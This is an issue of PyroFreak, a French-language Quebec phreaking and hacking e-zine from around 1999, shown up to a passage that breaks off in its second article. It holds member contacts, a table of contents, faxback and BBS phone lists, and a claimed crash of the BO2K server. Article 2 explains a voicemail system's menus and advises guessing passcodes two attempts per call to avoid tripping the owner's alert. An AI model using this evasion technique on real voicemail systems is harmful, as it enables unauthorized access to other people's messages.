2000 '::-::` (o o) ooO--(_)--Ooo- 1999-2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE Joyeux Noel et Bonne Année Tout le monde!!!! 2000 -::- Jamais 9 sans 10! .----..---'`````'. .` .` `. \ \ ) ___ __ _ _ _____ ______ \ \ / | |\ | |\| |\ | |\ | |\ \.-'``'-...-'``'-./ | ; | | | | | | | | | ; | | , , | x | | | ; | | | : | : | : | : : | ; : | |_: | | | x ; | | x | ; , , | ___/ \| |___ | | | ___| | |_ ____| | .; ;. | |\__\.` \__| | ; | |\ __\| \______\| | ; . ; | |_| | |_| | |_: | ;\ \ -._____/ \_____.- / \_\| \_\| \_\|_| | .9.nine. : \_x.' \`.x_/ : \_\| `. (._.) .' xxxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxx. x. ( \ / ) xxx. xxx. xx. xxx. xxx. x. xxx. x. \ \ ....--. / / xxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxxxx. .) \ /).---._\ / xxx. xxx. x. xxx. xxx. x. xxx. x. (. // / xxx. xxx. x. xxx. xxx. x. xxx. x. ) //`--._.--' xxx. xxx. x. xxxxxx. xxx. x. xxx. x. (`` Crédit: __2 1 Janvier 2000 Vous devez lire ceci avant d'aller plus loin: __________________________________________________________________________ |********************************DISCLAMER********************************| | | |Pyrofreakmag (et ses membres) tient à avertir les gens qui vont continuer| |à lire le texte qui va suivre qu' ont n'est aucunement responsables | |des actes, et même des pensées qui pourraient être produites par les | |lecteurs de ce zine par rapport à nos articles . Nous tenons à mettre | |cela bien au clair. Si vous n'êtes pas d'accord avec cette affirmation, | |fermez ce texte et effacer le de votre disque dur ou sur tout autres | |disques. Vous êtes le seul responsable de vos actes. | |Message s'adressant à la GRC: Si un article est dans l'illégalité, seul | |son auteur peut-être tenu responsable et non le groupe PYROFREAK en | |entier. Pas de poursuite, cé ca que ca veux dire simplement! Donc, vener | |pas nous faire chier!!!! | | | |NB: On considère ce magazine comme étant légal, si vous pensez qu'il ne | |l'est pas, continuer pas à lire ce qui suit! | | | | | |Plusieurs personnes nous on posé cette question: Pourquoi vous faite ce | |Magazine? Heh bien, j'ai la réponse à vous. C'est seulement pour démon- | |trer que certains systèmes ou compagnies, sont merdiques par rapport à un| |sujet en particulier, le but de ce magazine, est seulement de les faire | |réagir à la situation, pour qu'ils arrangent leur faille le plus rapide- | |ment possible. Donc, ont est la pour vous aider les compagnies. | |_________________________________________________________________________| =========================================================================== Comment nous rejoindre?: Voici les moyens de rejoindre les membres et COLLABORATEURS (De ce numéro) de Pyrofreak. Pour avoir la liste complète, aller sur le site web (www.PyroFreak.org) dans la section membres & cie. Soit par IRC, sur #PyroFreak, via le serveur undernet. --------------------------------------------------------------------------- Soit par e-mail: Pour rejoindre PyroFreak: pyrofreakmag@hotmail.com Pour rejoindre le WEBMASTER [-DaRK-]: webmaster@pyrofreak.org MEMBRES Pour rejoindre Neuro: neuro@pyrofreak.org Pour rejoindre Cyberride: cyberride@hotmail.com Pour rejoindre tekrebel: tekrebel@vl.videotron.ca Pour rejoindre Psykaos: shurikenbest@hotmail.com Pour rejoindre [G]r4FX: DarkM0nk@rocketmail.com Pour rejoindre NuCleaR: nuclear@pyrofreak.org Pour rejoindre [ewoks]: ewoks@pyrofreak.org Pour rejoindre Pilate: pilate@pyrofreak.org COLLABORATEURS Pour rejoindre endrix: fbasoft@yahoo.com Pour rejoindre Vip0|a: vipola@pyrofreak.org Pour rejoindre Oculair: oculair@pyrofreak.org Pour rejoindre Syst3m_Ex: syst3m@pyrofreak.org Pour rejoindre Karyu: Karyu@pyrofreak.org Pour rejoindre PaToFF: patoff22@hotmail.com Pour rejoindre LeMarquis: lemarquiz@yahoo.com Pour rejoindre Mononcle: Mononcle@beer.com Pour rejoindre Cyberdollar: cyberdollar@caramail.com Pour rejoindre Raleigh: raleigh@caramail.com Pour rejoindre ldastray: ldastray@yahoo.fr Pour rejoindre mXg: mxg@cyberdude.com Pour rejoindre [XTREAM]: xtream_18@hotmail.com Pour rejoindre Cloud-Strife: procra1@caramail.com Pour rejoindre gast0n: st0ng@caramail.com Pour rejoindre Triplex Phall: triplex@multimania.com Pour rejoindre Cid008: cid008@hotmail.com Pour rejoindre Toonstuck: Toonstuck@aol.com Pour rejoindre Spywalker: Spywalker@caramail.com ++++++++++++++++++++++++++++ --------------------------------------------------------------------------- Venez visiter notre site web: - http://www.pyrofreak.org :Celui-ci est updaté très régulièrement, donc allez le visiter, pour apprécier le magnifique travail de notre webmaster [-DaRK-], en passant, sur le site il y a plusieurs documents qui paraissent online, et qui ne sont pas dans les magazines de PyroFreak, donc à vous d'aller les lires. Plusieurs nouveaux programmes et textes onlines se sont rajouter, a vous d'aller voir ça. Aussi, maintenant vous pouvez lire les magazines de PyroFreak online sur le site, en version HTML, donc beaucoup plus rapide et moins compliqué. Aussi, beaucoup de log de scan (Phreak) on été rajouter sur le site, donc, si vous etes pas encore aller voir ca, j'me demande ben c'est quoi que vous attendez. Tout cela est dans la section Autres. Si vous rechercher quelques choses en particulier sur le site, utiliser notre tout nouveau moteur de recherche PyroFreak, celui-ci est très efficace. Vous pouvez aussi nous laisser un(e) message/critique ou poser une question sur notre wwwboard sur le site (Section Contact). GÊNER VOUS PAS, on a pas l'habitude de rire des gens:)! Si vous voulez etre informé des changements sur le site de PyroFreak, des dates de sortie de magazine, etc... Aller vous abonez a la Mailing List de PyroFreak sur le site, encore dans la section contact. ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #10, envoyez le à | |pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) | |SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en | |page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-| |tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . | |__________________________________________________________________________| Sujets D'articles proposés: -Logs de scan 1-800 ou autres -Explication de nouveaux type de Vmb ou Pbx -Critiques de divers programmes se rapportant a l'underground -Informations intéressantes sur les cellulaires ou pagettes (Tatoo) -Informations intéressantes sur un type de fraudage -Technique de hack particulières -Anecdote particulière -Programmation intéressante pour L'underground -Etc, utilisez votre imagination! : ^ ^ . | . \\ // | | | \\ // | | | (` \_/ ') | | | (` ') \ | / |\_ _/ | \|/ `.o\ O.' [## | | | [## | | U | (@) | ` _/ ' (@) | \ - / [#@\ (@| \~/ [##~\ (@|\_ / V \ `\ ) (@|_;\ -|._ _.|- / / | \ \ / `-----' \_/ ` | \ \/ / ` | \ BE LL __/ ' | \_/ | ' | | $UCKS / ' | `| |' ` | | | ` | `| |' ` | `--=--' ' | | | | ' |_| | | _ | ' / \ | | / \ | ` |:::| | | | | | ` .~|:::| | | | | | ` ' |___| | |_| |_| `.,' .-------. | _)/ # # \(_ | ___ | | _/- . : : . -\_ | | | | | ( ~__/ : : \__~ ) | | | | | `______' `______' |_| |_| "Phrackers Crest" ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 : | TABLE DES MATIERES '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ ____________________________________________________________________________ |# Titre de l'article Auteur de l'article | |___________________________________________________________________________| |1- Intro | Neuro | |2- Explication d'un type de VMB (MESSAGE CENTER) | Neuro | |3- Return of Datapac | LeMarquis | |4- Comment Installer Un EggDrop Sur Un Shell Account | Oculair | |5- Comment killer ces fuckin' popup | mXg | |6- Scanner un reseau (Cold fusion, Lotus, etc...) | Robert | |7- Critiques de Programmes | [-Dark-] | |8- HACKing Millenium (Belle petite histoire:)) | Karyu | |9- Problêmes avec un PSX en installant une modchips | [XTREAM] | |10- Locksmithing Part 1 -- Making your homemade lockpicks | Mononcle | |11- Logs de scan (Phreak) | Neuro | |12- Voler de ses propres ailes Part: 2 | LeMarquis | |13- Comment piraté la connexion gratuite de AltaVista et etc.| Cloud-Strife| |14- Programmation de trojan | Cyberrider | |15- Philo Time | PaToFF | |16- Plusieurs petits articles plus ou moins intéressants (5) | | |17- Scanner D'ondes, AnTeNNe | PaToFF | |18- Mots de passe par défaut (VMB & PBX) | Neuro | |19- Phreak a little with BELL CANADA!!! Part 2 | PaToFF | |20- Systeme Audix VMB | Neuro | |21- SCAN MINITEL GRATOS (Pour les Francais) | Spywalker | |22- DEPROFONDIS MORPIONIBUS (Pour les Francais) | gast0n | |23- Droits de L'Homme | PaToFF | |24- Convertir le binaire en d'autres language | Syst3m_Ex | |25- AT&T Easy Reach-800 | Neuro | |26- Windows NT IMAIL Vulnérabilité | endrix | |27- System administration (Vmb) | Neuro | |28- ISO, \\aReZ & MP3 (Part 2) | Vip0|a | |29- UNIX, hack et compagnie (1ère partie) | Tekrebel | |30- La blue box | Toonstuck | |31- PHREAK Vmb/PaBX (Newbie) | Toonstuck | |32- Encore et toujours les Cartes de Crédit (NuClEaR Box) | NuClEaR | |33- Les systèmes d'alarme | [ewoks] | |34- Emetteur télé | Skywalker |35- Les nouvelles en Vrac | | |36- Conclusion | Neuro | |_____________________________________________________________|_____________| NB:Le mag est corriger de facon a éliminer les fautes d'orthographe grandioses, donc désoler si y'a des incovénients. (Dépendant des articles). Raison: Sa gruge beaucoup trop de temps. ********************************************************************** * Pièces Jointes dans le .zip de ce numéro de PyroFreak * * * * Cocktails.txt: Un petit cadeau pour le temps des fêtes * * datapac2.qsc: Script, ce rapporter à l'article #3 * * 1-8XX-XXX-XXXX.txt: Feuille a blanc pour les scans (Article #11)* * WinLice.bas: Se rapportant à l'article #14 * * pyroart17-1.jpg: Image se rapportant à l'article # 17 * * pyroart17-2.jpg: Image se rapportant à l'article # 17 * * pyroart17-3.jpg: Image se rapportant à l'article # 17 * * PyroScan.asm: Dial-In à l'Éfligie de PyroFreak * * Pyrofreak.*: Le document que vous lisez en ce moment * ********************************************************************** ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 : | 1-Intro '.________Email: neuro@pyrofreak.org ______________ ____Par Neuro __ __ Heh oui, vous rêvez pas, on est bien rendu a notre #9. Donc, si vous pensiez qu'ont étaient seulement rendu au 4 ou 5, ben vous êtes en retard en cris, donc grouiller vous à aller télécharger ou lire onlines les maga- zines sur le site (Www.PyroFreak.Org). Bon, plusieurs personnes nous on dit que notre #8 étais un peu "faiblart", parce que il y avait trop de thé- orique et manque de pratique, donc pour le #9, on a essayer de remédier au probleme, a vous de juger si vous voyez une amilioration. L'an 2000: Heh non, j'vous fera pas le discours de bla bla bla du Bug de L'an 2000, parce que je crois que c'Est d'la pure marde. Le monde s'en préocupe beaucoup trop. Moi je crois que la véritable menace est la folie humaine, les cris de maniak Islamique ou autres. Pourquoi être si convaincu que ceux-ci ont la bonne religion, la est la question. C'est pourquoi, après mure réflexion, j'vous conseil de lire se mag avant le 1 Janvier 2000, au cas ou... >>-Site Web: www.PyroFreak.org Toujours Updater tres régulièrement, ALLER VOUS INSCRIRE A LA Mailing list, dans la section contact. Key PGP pour PyroFreak: Voici notre key Public: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.5.1 for non-commercial use mQGiBDgw03sRBADUCExTODf2IU4T4aC4FzlT3NysmGX4RsuhcFrP6H2jkSd08jXa HwMQIBqFPRdSsHcNiypeOm/69okv9qCG6TpCvLQZ24GnlSIwsgYAH9sJ+ONnDD9b XHGbkVTMQZTxXbr//pbWOtHTQuHF0xp9u1Q4G6ulxSAKUNdKqrJBL7v62QCg/ycI lllyi2hxvucdG5o03BA02CEEAJ5xfuRZA2MVPN+9oO5blMwXO+0rmoiK14maFgVy 7LB4hg1leOQFf2Nq3FpcrgrkxCvG47panSLTVQaEPZsmk5S5SpDhPxhzR+Hn4bBy /+va5/NWNEb2DCr7M8NN75Kel7PtGGCKJm6wOzI72N01Trw4rKM5OqCbXoe4YcPO 9DtiBAC8b29F5wUT+Zt0qfPiyhTOMftf7AnclDMYDIk8UoqV0a6GLaDHpjilOjif 1otqX5JARYfCYb8bbwvfFFAz/yqPNX5xpzFChD5QKciZ+IbXdYHi3S1rh0vMgLTp GwqL1aoNcW06cBK3/TdPwNTZaMxmW7zMEYLoKH/h7yDpXIa3erQtUHlyb2ZyZWFr IE1hZ2F6aW5lIDxweXJvZnJlYWttYWdAaG90bWFpbC5jb20+iQBMBBARAgAMBQI4 MNN7AgsCAhkBAAoJEJVPLe3+WRwP15IAn1o1cstpxi5uAFk1UQ8PmzvvokZfAKD7 S1ZzoBO/fFf5QIPEY2+b3xTPzrkCDQQ4MNN8EAgA9kJXtwh/CBdyorrWqULzBej5 UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1 WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC AggA3CvCaWUTeC9zxao9AoDJJfzUKLhib4nNR1C0+MNTDGeKKKLSQQLOobQKk4Ao Pr3Jqe/19p2aJYUu9Ma7r5GwK4hiH4sIGMlDJUprD7Nvr7/5WiKX7IQ+NNMk09RJ TvFp+b5N5t5rQjGUfkRbWrIZcGLpo+qpL4NNimYG1MbTVqEb4GRSZXz0shY9sWu+ W3g/OuSXcIOXxJiXTmICmXIDOWRdACxngF1FBT802wBEOIu/VR9j6DtVpL8+vx+3 tPI6/Spy+ZadRD4+5hComuXTNzUiI0mcvG2WTqcOAJyuvRFm3ky7xzO6MWlie+Zg hBDENiqy6zRrWYN6mu1NZHZaWYkARgQYEQIABgUCODDTfAAKCRCVTy3t/lkcDx7v AJ45rAXK/NeWmwezmE+CGMEZYzJoxQCgsOgyc66kWIRJ2K/WIGgOIq4M3wo= =QSdb -----END PGP PUBLIC KEY BLOCK----- News pour PyroFreak #9 -- Bug découvert par endrix J'ai découvert qu'il est possible de faire un buffet overflow sur le serveur bo2k par cult of the dead cow. Celui qui croyait avoir conçu un programme parfait n'a point réussit. In ya face sir.... Anyway, j'ai utilisé dolphin systems dssocket ip/tcp control et winsock en vb. Pour l'instant j'ai juste réussit à faire planter le serveur avec un exploit en vb mais je crois qu'il est possible d'avoir accèss au serveur sans avoir à cracker le simple xor encryption de bo2k.... Je laisse ca pour vous les programmeurs... Jésus est MORT! +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++Annonces et Offres+++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Si vous distribuez notre magazine sur votre site, ou si vous avez un lien vers notre site, faîte nous le savoir par e-mail: pyrofreakmag@hotmail.com Ca va nous faire un grand plaisir d'annoncer votre site (Si celui en vaut le coup) dans le prochain numéro de PyroFreak ou sur notre site, qui surement fera monter le nombre de visiteurs sur votre site. NB: J'ai bien dis si le site en vaut le coup. Cours sur notre Channel Irc #PyroFreak (Undernet) J'aimerais souligné que durant le prochain mois, plusieurs cours vont etre donnés sur notre channel IRC, dont soyez y! Ils vont être annoncés dans le topic du chanel. On recherche des gens qui serais intéressés à donner un ou plusieurs cours sur notre channel, d'un sujet divers traitant de l'underground. Que ca soit un cours pour montrer une technique de fumage de weed, ou une tech- nique sur le "piratage" téléphonique, peu importe, autant que ca soit pas trop du déja vu. Si ya des intéressés, venez nous visiter sur notre channel IRC , #PyroFreak ! (Autant Francais que Quebecois). PyroFreak recherche de bons codeurs, soit en Win ou en Linux/Unix, donc si vous êtes intéressé à vous impliquez dans PyroFreak, et que vous avez de bonnes connaisances en programmation, contacter nous a: pyrofreakmag@hotmail.com Et on vous donnera plus d'informations sur le sujet. On recherche aussi quelqu'un qui pourrais nous trouver de bons arti- cles de journaux récents, si vous voulez un exemple de ce que nous parlons, aller lire la section Nouvelles en vrac a la fin de ce magazine. PyroFreakmag@hotmail.com Pyrofreak est à la recherche d'un shell account permanent et rapide afin de pouvoir héberger la PyRoFrEaK Radio, si vous avez un shell correspon- dants aux critères ci-dessus et que vous voulez le partager avec Pyrofreak svp, avertissez oCuLaIr par E-Mail à l'adresse oculair@pyrofreak.org ou bien /msg oCuLaIr sur IRC. L'AUTEUR DE MÉLISSA "Hummm moi je me demande pourquoi ils ne poursuivent pas Microsoft pour avoir, sur le marché, un système d'exploitation aussi nulle côté protec- tion des virus !?!?! Avez-vous déjà entendu parler d'un virus qui a fait des milliers de dollars de dommages à des plateformes qui roulent sur Unix, Linux !?!?! Moi non... ", demande Luc Bergeron. ___________________________________________________________________________ Pour ce numéro de PyroFreak j'ai décidé de vous donnez une nouvelle liste de # de FaxBack. Si vous savez pas c'est quoi, ben aller lire PyroFreak #5 l'article #1. NB: Tout ces numéros de faxback on été tester par Neuro au début de Dé- cembre 1999. ------------------- 1-800-268-9100 Bell Canada 1-900, 976, Info Line (2,1,2,AC,NUM,#,#) 1-800-323-6586 Tandy Retail Services FAX-Back. (1,2,#,#,AC,NUM,1,AC,NUM,#) 1-800-345-1518 Compaq Computer PaqFax (1,1,1,1,1,#,#,AC,NUM,1,2,AC,NUM,#) 1-800-365-0696 Genecom Corporation (3,1,1,1,#,#,AC,NUM,1,2,,AC,NUM,#) 1-800-446-6212 Analog Fax (2,1,0,AC,NUM,1,AC,NUM,#,1) 1-800-451-2100 Lucent Technologies Main number (6,AC,NUM,2,AC,NUM,1) 1-800-483-2495 Central FAX on demand. (1,2,1,2,AC,NUM,#,1,2,AC,NUM,#) 1-800-522-6752 Amp Fax (1,8,90,#,1,#,AC,NUM,#,#,AC,NUM,#,#,#) 1-800-832-4778 Western Digital Fax Access (2,1,1,1,AC,NUM,#,1,AC,NUM,#,1) 1-800-909-0261 Apple Fax. (AC,NUM,#,1,AC,NUM,#,1) 1-800-909-0263 3M Economic Services (1,AC,NUM,#,1,AC,NUM,#,1) 1-800-909-0264 Kinko's Fax-On-Demand Service. (1,AC,NUM,#,1,AC,NUM,#,1) 1-800-909-0269 Co-merica Bank, California's (1,1,AC,NUM,#,1,AC,NUM,#,1) 1-800-943-8329 ADT Fax-On-Demand-Service. (2,1,AC,NUM,#,1,AC,NUM,#,1) 1-800-426-4329 IBM FAX Information Service. (1,1,0,1,1,1,AC,NUM,#,1,1) 1-800-759-8737 SkyTel Customer Service. (3,1,AC,NUM,#,AC,NUM,#,1) 1-800-323-6586 Candy Faxback (1,1,1,#,2,AC,NUM,1,AC,NUM,#) ___________________________________________________________________________ Aussi pour ce numéro de PyroFreak, on a décidé de vous donnez une liste de numéro de BBS de la région de Montreal. Je sais que c'est dépassé, mais ça rappele de bons souvenirs, et ca peut-etre intéressant quelques fois. Si vous avez d'autres numéros de BBS que ceux-ci, veuillez nous les faires parvenir à pyrofreakmag@hotmail.com . (Partout au Quebec ou en France, ou des BBS 1-800) Crédit: Juxtaposition BBS BBS Directory listing for the Montreal (450,514) dialing area with 74 numbers listed Issue: Volume 14, Number 1 Date: Satureday April 3rd, 1999 Released by Stephen Monteith via Juxtaposition BBS Now in its 15th year Copyright (C) 1985 to 1999 by Stephen Monteith All rights reserved An '*' next to the phone number means a recent change. Numbers verified 99/04/03 18:00-19:30 ------------------------------------------------------------------------------- NAME OF BBS PHONUMBR BD $FL COMMENTS -------------------------------- ------------ -- --- -------------------------- Alpha Wars 450-424-5695 14 NNB Trade Wars Axess Communications *514-940-1070 56 --- BBS at the End of the Universe 514-421-0673 14 NYE Science fiction Beyond the Dark Portal *450-621-7532 56 NYB Buchanan's Keep 514-626-1186 19 NYE Convo.,Seniors welcome Car Enterprise 514-327-3881 14 NYE F167/219,Conversation Club Macintosh de Montreal *514-840-9001 33 YYB CD Coder's Pixel 514-624-5900 28 VYB Programming Oriented Com-Aid BBS 514-747-5991 24 NYB Commodore Users Group Communications Accessibles Mtl. 514-596-2255 14 YYB Internet Service Provider Communications Accessibles Mtl. 514-596-2545 14 YYB Login as 'info' Compuserve 28800 *514-879-5826 33 YYE 7-E-1 Compuserve 28800 *514-879-8519 33 YYE 7-E-1 Concept Blazer 514-723-6029 33 NYB FIDO,Demos,Music,CD,NETs Concordia Centrex III 514-848-8800 14 NYB 7 E 1 Concordia Library "CLUES" 514-848-4585 14 NNB Catalog access Cruising Bar BBS 450-666-8616 14 VYF Renegade BBS,Msgs BBS Crypt BBS, The 514-767-4541 96 NNE General Datapac 514-875-9470 24 NNB Drag Zone *450-665-9117 33 NYB Amiga etc,msgs EUREK<\ BBS Node 1 *450-967-0253 33 VYB MultiLine chatting rooms Evening Shade Node 1 450-466-9637 28 VYB Free Internet E-mail Evening Shade Node 2 450-466-5318 14 YYB Adult Section,TW2002,LORD Evening Shade Node 3 450-466-9050 14 YYB Internet (WWW/FTP/IRC,etc) Falcon's Nest BBS 450-562-2497 28 NYB Doors,1.2G Fichier Central BBS *514-522-2701 14 NYB Fichiers,Msg,Nmai Firefield *450-679-7599 28 NYB Firefield BBS 450-679-7599 33 NYB GEnie 514-744-5040 24 YYE GST information BBS 800-267-4500 33 NNB GST information GameMaster BBS, The 514-523-2103 28 NYB Internet T3,games,65 lines GameMaster BBS, The 514-523-7979 14 NYB Green Machine 450-692-9872 33 VYB EveryoneWelcome! Have Fun! House of the Rising Sun 514-881-9708 33 NYB Linux, Cyberpunk,e-text IBM Global Network 514-846-7171 56 --- Ingestco BBS *450-439-7082 14 NYB Francomedia,Canadmedia Juxtaposition BBS Line 1 514-364-2937 33 NYE Fido,MTLNet,OS/2,Anime, Juxtaposition BBS Line 2 514-367-1505 33 NYE Doors,FREE ACCESS!,BRE Juxtaposition BBS Line 3 514-364-9940 33 NYE Running over 13 years L'ALBATROS! 514-376-0721 96 NYB F167/245 LINQ BBS *514-522-3866 33 YYB 15 Gigs,28 lines Laval 450-979-1965 24 NYB Lions BBS *450-923-7925 33 NYB 1:167/580 Files & + Lost in the Darkside *450-962-3454 33 NYB Doors Luca SBE! 450-466-6904 28 VYF Messages+Fichiers,Proboard Magickal Hourglass, The 514-685-8600 28 NYB WWIV-netted,woman&pagan McBBS 514-697-7184 14 NYE Conversation bbs McGill 1 Library, "USEMUSE" 514-398-8111 24 NNB 7 E 1 McGill 2 *514-398-8211 56 NNB 7 E 1 McGill 3 514-398-8711 96 NNB 7 E 1 Media Spectrum-ringdown *514-366-0670 14 NYE Internet Email, Classified MisTy MounTainS BBS 450-461-3460 14 NYB Anime,Hentai,RPG,Msgs Morning Shadows 514-421-0407 14 NYB Msgs,some files Mysteria BBS Node 1&2 514-257-8043 33 VYB F167/700,Reseaux,Doo Next Generation BBS 450-649-3675 33 NYB Excalibur,XXX,Startrek PitStop International Racing BBS 450-628-4362 14 NYB F167/173 Random Thoughts 514-331-8158 14 VYB files,doors,1.28gig Rebel's Chapitre (NoRtH) *450-588-0941 33 NYB msg,files,doors,chat Revenue Canada (TPS) 800-267-5979 Rocket's BBS 450-656-1533 33 NYB F167/512 Rubber Chicken Factory, The *514-486-0316 28 NYE Shareware,Graphics S-Tek (Gay & Lesbian BBS) *514-597-2409 28 YYB 18 lines, Internet GAI.COM SSSFFF Online 514-769-7546 28 VYB Games,X-Rated CD,Fido NEC SUP-TECH 450-468-4744 28 NYB 7CD's/1000 File/Msg base Secret System 450-429-5464 14 NYB Doors,Files,Msgs Shadow of Light 450-656-9529 28 NYB Shadow net HQ,RPGs Star, The 514-286-1796 96 NYB F167/275 Super Ultrason BBS 514-259-0213 28 VYB F167/330,Fido/ATFnet,TG27 Touch of Death BBS, The 450-445-4867 33 NYB Doors,Msgs,Shareware Twilight 450-926-8444 14 NNE Conversations,All computer Tymnet 514-747-1370 24 NNE (E 7 1) USRobotics Filegate 514-276-4630 28 VYB F167/132, USR Support Universite de Quebec a Montreal 514-285-6401 14 NNF Walden Commune Atari Support BBS 514-335-9192 28 NYB XL/XE/ST/STE/MEGA/FALCON -------------------------------- ------------ -- --- -------------------------- NAME OF BBS PHONUMBR BD $FL COMMENTS ------------------------------------------------------------------------------- EXPLANATION OF THE COLUMNS AND CODES ------------------------------------ BD Maximum known BPS (Bits Per Second) rate of the BBS listed 30 300 BPS 12 1200 BPS 24 2400 BPS 96 9600 BPS 14 14400 BPS 19 19200 BPS 21 21600 BPS 28 28800 BPS 33 33600 BPS MA Computer the BBS is running on. AM = Amiga AT = Atari C= = Commodore 8 bit computers (other than Amiga) CC = Radio Shack's Colour Computer IB = IBM PC and clones IS = Internet Service Provider MA = Macintosh series OB = Osborne CP/M computers NE = Network ST = Atari ST $FL $)Fees N = Free board - No charge Y = Charges a fee to access V = Voluntary donations accepted F)iles Y = Yes N = No L)anguage B = Bilingual E = English F = French ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #10, envoyez le à | |pyrofreakmag@hotmail.com . Ou si vous avez des questions ou commentaires, | |envoyez les aussi a pyrofreakmag@hotmail.com . | |__________________________________________________________________________| Pour les petits perverts:)), voici 2 numéro 1-800 free de SEX!!! Heh oui, vous avez bien ENTENDU, GRATUIT!!!! Wo wo, pas toute sul téléphone en même temps la!! 1-800-545-9969 1-800-938-2255 Si vous avez une carte de crédit: 1-800-207-4688 Sex avec un #CC ($2.99 - $4.99 US) 1-800-666-2661 Phone Sex avec un #CC (3.98 par min) ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #9 | 2-Explication d'un type de VMB (MESSAGE CENTER) |(X) Phreak ( ) Hack ( ) Autres '.__________Par Neuro________ ________ neuro@pyrofreak.org ______ ___ Salut tlm, pour cet article j'ai décidé de vous faire connaitre un nouveau type de VMB que je viens de découvrir. J'ai trouvé aucuns documents ou informations (anglaise ou francaise) sur le net sur ce type de box. C'est pourquoi j'ai décidé de vous expliquer le systeme de A à Y:). Parce qu'il y a encore quelques petites affaires que j'ai pas compris, mais ca devrais pas tarder. Si vous voulez un exemple de ce type de box, appeler au: 1-800-909-3065 Ce systeme peu avoir qu'une VMB sur le systeme, donc quand vous appelez au numéro, vous êtes directement en communication sur l'unique box du systeme. Pour accéder à l'aurorisation (Password), vous devez appuyer sur '*' durant le greeting. À ce moment vous êtes supposé entendre: "Hello, "name" please enter your passcode:". Le "name" étant le nom de l'usager de la box. Cela est un des seul moyens que j'ai trouvé, pour le moment, pour reconnaître ce type de systeme. J'ai pas entendu le nom du systeme sur la box, mais je viens de savoir quel porte le nom de "MESSAGE CENTER". Le mot de passe peu avoir entre 4 et 10 chiffres. Le systeme est spécial par rapport au password, parce que: Exemple ton password est: 12349. Si tu compose le bon password, ta pas besoin d'appuyer sur '#', tu rentre dans ta box automatiquement. Sinon, la bonne femme t'averti pas ,que c'est le mauvais password, avant que tu es composé 10 chiffres ou que tu es appuyé sur le '#'. Donc, le '#' n'est pas necessaire pour s'identifier. Vous avez 3 tentatives pour vous identifiez, si vous réussissez pas, vous etes déconnec- ter de la box. Si quelqu'un essais de s'identifier à plusieurs reprises (3 en ligne), sans réussir, un message est transmi à la box. Ce qui veux dire, que quand l'opérateur de la box va aller entendre ces messages, il va avoir un message disant que le systeme a été abuser, avec trop de tentatives d'identification infructueuses. Donc si vous voulez hacker un systeme de ce type, sans que son opérateur soit au courant avant que vous aillez accès à la Box, vous faîte seulement des tentatives de 2 coups avec chaque connection à la Box. Pour sauter le greeting et laisser un message sur la box, vous appu- yez sur n'importe quel touche, a part '*'. Apres avoir dit votre message, vous pouvez raccrocher, et le message est envoyé, ou vous pouvez appuyer sur n'importe quel touche pour accèder au menu suivant: (Celui-ci est aussi un autre moyen de reconnaitre ce type de box) (2)A-To append your message and continu recording (3)D-To delete your message and record over (5)L-To leave a fax of your message (OutDial Fax) (7)R-To review your message (8)U-To make your message urgent (9)X-To Delivery your message and Exit the system --------------------------------Francais----------------------------------- Bon, pour les besoins de la cause, j'ai décidé de vous traduire ca en Francais, cela pour le monde à qui l'anglais leur fait chier. J'ai fait du mieux que j'ai pu, étant moi-meme pas un pro de l'anglais. Donc, revoici le meme menu, mais en Francais. (2)A-Pour reprendre l'enregistrement de votre message, ou vous l'aviez arrêter (3)D-Pour effacer le message et le réenregistrer (5)L-Pour envoyer un fax (OutDial Fax) (7)R-Pour réentendre votre message enregistrer (8)U-Mettre l'attribu URGENT au message (9)X-Pour envoyer le message, et déconnecter du systeme --------------------------------------------------------------------------- Cela vous fais surement penser au systeme Audix avec ces lettres comme option, mais ce systeme n'a pas autant d'options que l'Audix. Maintenant, si vous avez accès à la box, voici le menu que vous allez entendre: (3)D-To delete it (4)G-To give it to another user (5)K-To keep the current message (6)M-Make a new message (7)P-To play the message (8)U-For user options (2)C-To change call schedual options (3)F-To Addict futur delivery messages (9)X-For exit to main menu (3)F-To change Fax Delivery options (6)N-To change your personnel fax telephone number (2)C-To change de current telephone number (5)K-To keep it (9)X-For exit to main menu (4)G-To change your greeting (5)L-To listen your greeting (7)R-Record your greeting (9)X-For exit to main menu (5)L-To change the distribution list (6)N-To change your name (7)P-To change your passcode (8)T-To activate (Tutorial) (9)X-For exit user options (9)X-To exit of the system --------------------------------Francais----------------------------------- (3)D-Effacer le message courrant (4)G-Envoyer le message courrant a un autre utilisateur du meme systeme (5)K-Sauvegarder le message courrant (6)M-Enregistrer un nouveau message (7)P-Faire jouer le message courrant (8)U-Options utilisateur (2)C-Options sur l'horaire* (3)F-Pour additionner de future message* (9)X-Sortir vers le menu principal (3)F-Options par rapport au Fax (6)N-Changer le numéro de Fax (2)C-Confirmation pour changer le numéro de Fax (5)K-Laisser le numéro sans changement (9)X-Sortir vers le menu principal (4)G-Pour changer le message d'intro de la VMB (5)L-Écouter votre message d'intro actuel (7)R-Enregistrer un nouveau message d'intro (9)X-Sortir vers le menu principal (5)L-Changer 